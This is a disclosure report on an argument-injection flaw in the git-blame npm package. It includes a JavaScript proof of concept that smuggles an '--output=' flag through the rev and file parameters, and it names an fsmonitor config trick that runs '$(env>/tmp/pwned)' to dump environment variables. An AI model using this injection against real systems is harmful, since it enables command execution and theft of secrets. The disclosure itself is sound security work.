Argument Injection vulnerability in git-blame@1.4.0

The git-blame project describes itself as a library that allows shelling out to git blame in a streaming Node fashion. This report was privately disclosed to the maintainer yet remains unpatched as the maintainer did not reply to follow-up messages.

Resources:

Project’s GitHub source code: https://github.com/alessioalex/git-blame
Project’s npm package: https://www.npmjs.com/package/git-blame

Background

I’m reporting an Argument Injection vulnerability in the git-blame npm package.

This vulnerability allows arbitrary command injection due to:

git blame allows for argument injection via the --output=/some/file/here command-line flag
a bare git repository allows for a local config file that instrcuts git to use its core configuration option fsmonitor and sets it to any arbirary comamnd, such as $(env>/tmp/pwned)

The maintainer accounted for the security in file input but rev is still vulnerable.

Exploit Proof of Concept

/* eslint-disable no-console, func-names */
'use strict';

var gitBlame = require('./');
var path = require('path');

var repoPath = path.resolve(process.env.REPO || (__dirname + '/.git'));
// var file = process.env.FILE || 'package.json';
// var rev = process.env.REV || 'HEAD';
var file = '--output=hello.txt';
var rev = '--output=hello.txt';

gitBlame(repoPath, {
  file: file,
  rev: rev
}).on('data', function (type, data) {
  // type can be 'line' or 'commit'
  console.log(type, data);
}).on('error', function (err) {
  console.error(err.message);
  process.exit(1);
}).on('end', function () {
  console.log('±±±±±±±±±±±±±±±±±±');
  console.log("That's all, folks!");
});

Argument Injection vulnerability in git-blame@1.4.0

Argument Injection vulnerability in git-blame@1.4.0

Background

Exploit Proof of Concept

Supporting references

Node.js Security Newsletter